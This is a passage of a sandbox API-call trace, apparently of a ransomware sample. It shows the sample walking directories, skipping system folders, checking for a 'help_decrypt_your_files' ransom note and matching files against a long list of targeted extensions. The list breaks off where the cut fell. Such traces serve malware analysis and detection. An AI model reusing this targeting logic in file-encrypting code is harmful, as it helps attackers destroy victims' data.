	[0167.834] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*"
	[0167.835] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.838] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned 89
	[0167.838] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.838] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned 0x59
	[0167.838] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.839] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="windows") returned 0x0
	[0167.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.839] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="boot") returned 0x0
	[0167.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.839] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="system volume information") returned 0x0
	[0167.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.839] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.839] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.840] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="temp") returned 0x0
	[0167.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.840] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="program files") returned 0x0
	[0167.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.840] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.840] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="appdata") returned 0x0
	[0167.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="application data") returned 0x0
	[0167.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="winnt") returned 0x0
	[0167.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="tmp") returned 0x0
	[0167.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.841] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="cache") returned 0x0
	[0167.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="webcache") returned 0x0
	[0167.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.842] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="inetcache") returned 0x0
	[0167.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="nvidia") returned 0x0
	[0167.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="packages") returned 0x0
	[0167.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="cookies") returned 0x0
	[0167.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpSrch="programdata") returned 0x0
	[0167.844] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.844] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1
	[0167.844] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1
	[0167.844] lstrcmpW (lpString1="folder.ico", lpString2="..") returned 1
	[0167.844] lstrcmpW (lpString1="folder.ico", lpString2=".") returned 1
	[0167.845] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.845] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="folder.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"
	[0167.845] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96
	[0167.845] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.845] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", cchLength=0x60 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 0x60
	[0167.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.845] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.845] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"
	[0167.845] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96
	[0167.845] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.846] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.846] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.846] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_pref.ico", cAlternateFileName="")) returned 1
	[0167.846] lstrcmpW (lpString1="print_pref.ico", lpString2="..") returned 1
	[0167.847] lstrcmpW (lpString1="print_pref.ico", lpString2=".") returned 1
	[0167.847] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.847] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="print_pref.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"
	[0167.847] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100
	[0167.847] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.847] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 0x64
	[0167.847] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.847] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.847] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"
	[0167.848] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100
	[0167.848] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.848] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.848] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.848] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.848] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vu